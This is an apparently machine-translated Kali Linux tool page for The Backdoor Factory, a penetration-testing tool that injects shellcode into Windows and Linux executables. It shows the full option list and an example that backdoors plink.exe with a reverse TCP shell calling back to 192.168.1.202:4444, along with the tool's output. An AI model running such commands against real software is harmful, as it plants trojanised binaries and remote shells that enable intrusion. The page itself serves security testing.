后门厂包装说明
BDF的目标是修补程序可执行的二进制文件与用户desidered的shellcode并不断的修补前的状态正常执行。
支持:Windows PE的X32 / X64和Linux ELF X32 / X64(系统V)
一些可执行文件有内置的保护,因为在所有的二进制文件这一等将无法正常工作。重要的是,您将它们部署到客户端或利用他们在演习之前测试的目标二进制文件是明智的。
资料来源:https://github.com/secretsquirrel/the-backdoor-factory/
借壳工厂首页 - 卡利后门工厂回购
- 作者:约书亚·皮茨
- 许可:GPLv3的
包括在后门工厂封装工具
借壳工厂 - 补丁的win32 / 64二进制文件的shellcode
[email protected]:~# backdoor-factory
-.(`-') (`-') _ <-.(`-') _(`-') (`-')
__( OO) (OO ).-/ _ __( OO)( (OO ).-> .-> .-> <-.(OO )
'-'---.\ / ,---. \-,-----.'-'. ,--.\ .'_ (`-')----. (`-')----. ,------,)
| .-. (/ | \ /`.\ | .--./| .' /'`'-..__)( OO).-. '( OO).-. '| /`. '
| '-' `.) '-'|_.' | /_) (`-')| /)| | ' |( _) | | |( _) | | || |_.' |
| /`'. |(| .-. | || |OO )| . ' | | / : \| |)| | \| |)| || . .'
| '--' / | | | |(_' '--'\| |\ \| '-' / ' '-' ' ' '-' '| |\ \
`------' `--' `--' `-----'`--' '--'`------' `-----' `-----' `--' '--'
(`-') _ (`-') (`-')
<-. (OO ).-/ _ ( OO).-> .-> <-.(OO ) .->
(`-')-----./ ,---. \-,-----./ '._ (`-')----. ,------,) ,--.' ,-.
(OO|(_\---'| \ /`.\ | .--./|'--...__)( OO).-. '| /`. '(`-')'.' /
/ | '--. '-'|_.' | /_) (`-')`--. .--'( _) | | || |_.' |(OO \ /
\_) .--'(| .-. | || |OO ) | | \| |)| || . .' | / /)
`| |_) | | | |(_' '--'\ | | ' '-' '| |\ \ `-/ /`
`--' `--' `--' `-----' `--' `-----' `--' '--' `--'
Author: Joshua Pitts
Email: the.midnite.runr[a t]gmail<d o t>com
Twitter: @midnite_runr
v2.0.6
Usage: backdoor.py [options]
Options:
-h, --help show this help message and exit
-f FILE, --file=FILE File to backdoor
-s SHELL, --shell=SHELL
Payloads that are available for use.
-H HOST, --hostip=HOST
IP of the C2 for reverse connections
-P PORT, --port=PORT The port to either connect back to for reverse shells
or to listen on for bind shells
-J, --cave_jumping Select this options if you want to use code cave
jumping to further hide your shellcode in the binary.
-a, --add_new_section
Mandating that a new section be added to the exe
(better success) but less av avoidance
-U SUPPLIED_SHELLCODE, --user_shellcode=SUPPLIED_SHELLCODE
User supplied shellcode, make sure that it matches the
architecture that you are targeting.
-c, --cave The cave flag will find code caves that can be used
for stashing shellcode. This will print to all the
code caves of a specific size.The -l flag can be use
with this setting.
-l SHELL_LEN, --shell_length=SHELL_LEN
For use with -c to help find code caves of different
sizes
-o OUTPUT, --output-file=OUTPUT
The backdoor output file
-n NSECTION, --section=NSECTION
New section name must be less than seven characters
-d DIR, --directory=DIR
This is the location of the files that you want to
backdoor. You can make a directory of file backdooring
faster by forcing the attaching of a codecave to the
exe by using the -a setting.
-w, --change_access This flag changes the section that houses the codecave
to RWE. Sometimes this is necessary. Enabled by
default. If disabled, the backdoor may fail.
-i, --injector This command turns the backdoor factory in a hunt and
shellcode inject type of mechinism. Edit the target
settings in the injector module.
-u SUFFIX, --suffix=SUFFIX
For use with injector, places a suffix on the original
file for easy recovery
-D, --delete_original
For use with injector module. This command deletes
the original file. Not for use in production systems.
*Author not responsible for stupid uses.*
-O DISK_OFFSET, --disk_offset=DISK_OFFSET
Starting point on disk offset, in bytes. Some authors
want to obfuscate their on disk offset to avoid
reverse engineering, if you find one of those files
use this flag, after you find the offset.
-S, --support_check To determine if the file is supported by BDF prior to
backdooring the file. For use by itself or with
verbose. This check happens automatically if the
backdooring is attempted.
-q, --no_banner Kills the banner.
-v, --verbose For debug information output.
借壳工厂用法示例
指定二借壳(-f /usr/share/windows-binaries/plink.exe),设置连接回IP(-H 192.168.1.202),在连接回端口(-P 4444),和外壳使用(-s reverse_shell_tcp):
[email protected]:~# backdoor-factory -f /usr/share/windows-binaries/plink.exe -H 192.168.1.202 -P 4444 -s reverse_shell_tcp
__________ __ .___
\______ \_____ ____ | | __ __| _/____ ___________
| | _/\__ \ _/ ___\| |/ // __ |/ _ \ / _ \_ __ \
| | \ / __ \\ \___| </ /_/ ( <_> | <_> ) | \/
|______ /(____ /\___ >__|_ \____ |\____/ \____/|__|
\/ \/ \/ \/ \/
___________ __
\_ _____/____ _____/ |_ ___________ ___.__.
| __) \__ \ _/ ___\ __\/ _ \_ __ < | |
| \ / __ \\ \___| | ( <_> ) | \/\___ |
\___ / (____ /\___ >__| \____/|__| / ____|
\/ \/ \/ \/
Author: Joshua Pitts
Email: the.midnite.runr[a t]gmail<d o t>com
Twitter: @midnite_runr
v2.0.6
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Looking for caves that will fit the minimum shellcode length of 358
[*] All caves lengths: (358,)
############################################################
The following caves can be used to inject code and possibly
continue execution.
**Don't like what you see? Use jump, single, or append.**
############################################################
[*] Cave 1 length as int: 358
[*] Available caves:
1. Section Name: None; Section Begin: None End: None; Cave begin: 0x280 End: 0x1000; Cave Size: 3456
2. Section Name: .text; Section Begin: 0x1000 End: 0x37000; Cave begin: 0x36981 End: 0x37000; Cave Size: 1663
3. Section Name: None; Section Begin: None End: None; Cave begin: 0x47cec End: 0x48004; Cave Size: 792
4. Section Name: .data; Section Begin: 0x48000 End: 0x4a000; Cave begin: 0x48961 End: 0x48b90; Cave Size: 559
5. Section Name: None; Section Begin: None End: None; Cave begin: 0x4907c End: 0x4a00e; Cave Size: 3986
**************************************************
[!] Enter your selection: 2
Using selection: 2
[*] Changing Section Flags
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] /usr/share/windows-binaries/plink.exe backdooring complete
File /usr/share/windows-binaries/plink.exe is in the 'backdoored' directory